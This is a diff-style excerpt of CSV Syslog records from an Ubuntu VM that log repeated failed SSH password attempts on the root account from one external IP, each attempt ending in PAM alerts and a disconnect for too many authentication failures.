+1736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:45,UbuntuDevEnv,2019-06-28 04:54:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 6421 ssh2 [preauth],88391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6421,,
+1737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:45,UbuntuDevEnv,2019-06-28 04:54:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:53,UbuntuDevEnv,2019-06-28 04:54:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:54:55,UbuntuDevEnv,2019-06-28 04:54:55,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 52937 ssh2,88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,52937,,
+1740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:02,UbuntuDevEnv,2019-06-28 04:54:59,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 52937 ssh2],88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,52937,,
+1741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:07,UbuntuDevEnv,2019-06-28 04:55:07,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 52937 ssh2,88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,52937,,
+1742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:12,UbuntuDevEnv,2019-06-28 04:55:11,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 52937 ssh2],88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,52937,,
+1743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:12,UbuntuDevEnv,2019-06-28 04:55:11,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:12,UbuntuDevEnv,2019-06-28 04:55:11,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 52937 ssh2 [preauth],88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,52937,,
+1745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:12,UbuntuDevEnv,2019-06-28 04:55:11,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 52937: Too many authentication failures [preauth],88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,52937,,
+1746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:12,UbuntuDevEnv,2019-06-28 04:55:11,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:22,UbuntuDevEnv,2019-06-28 04:55:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:24,UbuntuDevEnv,2019-06-28 04:55:23,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 55012 ssh2,88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,55012,,
+1749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:27,UbuntuDevEnv,2019-06-28 04:55:25,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 55012 ssh2,88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,55012,,
+1750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:30,UbuntuDevEnv,2019-06-28 04:55:30,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 55012 ssh2,88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,55012,,
+1751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:46,UbuntuDevEnv,2019-06-28 04:55:45,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 193.201.224.232 port 55012 ssh2],88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,55012,,
+1752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:46,UbuntuDevEnv,2019-06-28 04:55:45,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:46,UbuntuDevEnv,2019-06-28 04:55:45,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 55012 ssh2 [preauth],88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,55012,,
+1754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:46,UbuntuDevEnv,2019-06-28 04:55:45,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:46,UbuntuDevEnv,2019-06-28 04:55:45,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 55012: Too many authentication failures [preauth],88540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,55012,,
+1756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:48,UbuntuDevEnv,2019-06-28 04:55:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:55:51,UbuntuDevEnv,2019-06-28 04:55:50,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 6104 ssh2,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6104,,
+1758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:02,UbuntuDevEnv,2019-06-28 04:56:00,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 193.201.224.232 port 6104 ssh2],88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6104,,
+1759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:03,UbuntuDevEnv,2019-06-28 04:56:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 6104: Too many authentication failures [preauth],88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,6104,,
+1760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:03,UbuntuDevEnv,2019-06-28 04:56:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 6104 ssh2 [preauth],88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6104,,
+1761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:03,UbuntuDevEnv,2019-06-28 04:56:03,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 6104 ssh2,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6104,,
+1762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:03,UbuntuDevEnv,2019-06-28 04:56:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:03,UbuntuDevEnv,2019-06-28 04:56:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:20,UbuntuDevEnv,2019-06-28 04:56:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:21,UbuntuDevEnv,2019-06-28 04:56:21,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 48972 ssh2,88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,48972,,
+1766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:27,UbuntuDevEnv,2019-06-28 04:56:26,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 48972 ssh2],88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,48972,,
+1767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:29,UbuntuDevEnv,2019-06-28 04:56:28,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 48972 ssh2,88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,48972,,
+1768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:36,UbuntuDevEnv,2019-06-28 04:56:36,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:36,UbuntuDevEnv,2019-06-28 04:56:36,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 48972 ssh2 [preauth],88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,48972,,
+1770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:36,UbuntuDevEnv,2019-06-28 04:56:36,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:36,UbuntuDevEnv,2019-06-28 04:56:36,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 193.201.224.232 port 48972 ssh2],88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,48972,,
+1772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:36,UbuntuDevEnv,2019-06-28 04:56:36,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 48972: Too many authentication failures [preauth],88779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,48972,,
+1773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:43,UbuntuDevEnv,2019-06-28 04:56:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:45,UbuntuDevEnv,2019-06-28 04:56:44,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 26708 ssh2,88857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,26708,,
+1775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:56,UbuntuDevEnv,2019-06-28 04:56:56,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:56,UbuntuDevEnv,2019-06-28 04:56:56,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 193.201.224.232 port 26708 ssh2],88857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,26708,,
+1777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:56,UbuntuDevEnv,2019-06-28 04:56:56,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 26708 ssh2 [preauth],88857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,26708,,
+1778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:56,UbuntuDevEnv,2019-06-28 04:56:56,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 26708: Too many authentication failures [preauth],88857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,26708,,
+1779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:56:56,UbuntuDevEnv,2019-06-28 04:56:56,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:57:02,UbuntuDevEnv,2019-06-28 04:57:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:57:04,UbuntuDevEnv,2019-06-28 04:57:03,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 6406 ssh2,88924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6406,,
+1782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:57:17,UbuntuDevEnv,2019-06-28 04:57:17,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,88924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:57:17,UbuntuDevEnv,2019-06-28 04:57:17,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 6406: Too many authentication failures [preauth],88924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,6406,,
+1784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:57:17,UbuntuDevEnv,2019-06-28 04:57:17,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,88924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:57:17,UbuntuDevEnv,2019-06-28 04:57:17,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 6406 ssh2 [preauth],88924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6406,,
+1786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:57:17,UbuntuDevEnv,2019-06-28 04:57:17,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 193.201.224.232 port 6406 ssh2],88924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,6406,,
+1787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:00,UbuntuDevEnv,2019-06-28 04:57:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:02,UbuntuDevEnv,2019-06-28 04:58:01,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 25120 ssh2,89104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,25120,,
+1789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:04,UbuntuDevEnv,2019-06-28 04:58:04,auth,UbuntuDevEnv,info,Failed password for root from 193.201.224.232 port 25120 ssh2,89104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,25120,,
+1790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:17,UbuntuDevEnv,2019-06-28 04:58:16,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=root,89104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,,0,
+1791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:17,UbuntuDevEnv,2019-06-28 04:58:16,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 193.201.224.232 port 25120 ssh2 [preauth],89104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,25120,,
+1792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:17,UbuntuDevEnv,2019-06-28 04:58:16,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 193.201.224.232 port 25120 ssh2],89104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,25120,,
+1793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:17,UbuntuDevEnv,2019-06-28 04:58:16,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,89104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:58:17,UbuntuDevEnv,2019-06-28 04:58:16,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 193.201.224.232 port 25120: Too many authentication failures [preauth],89104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,193.201.224.2,25120,,
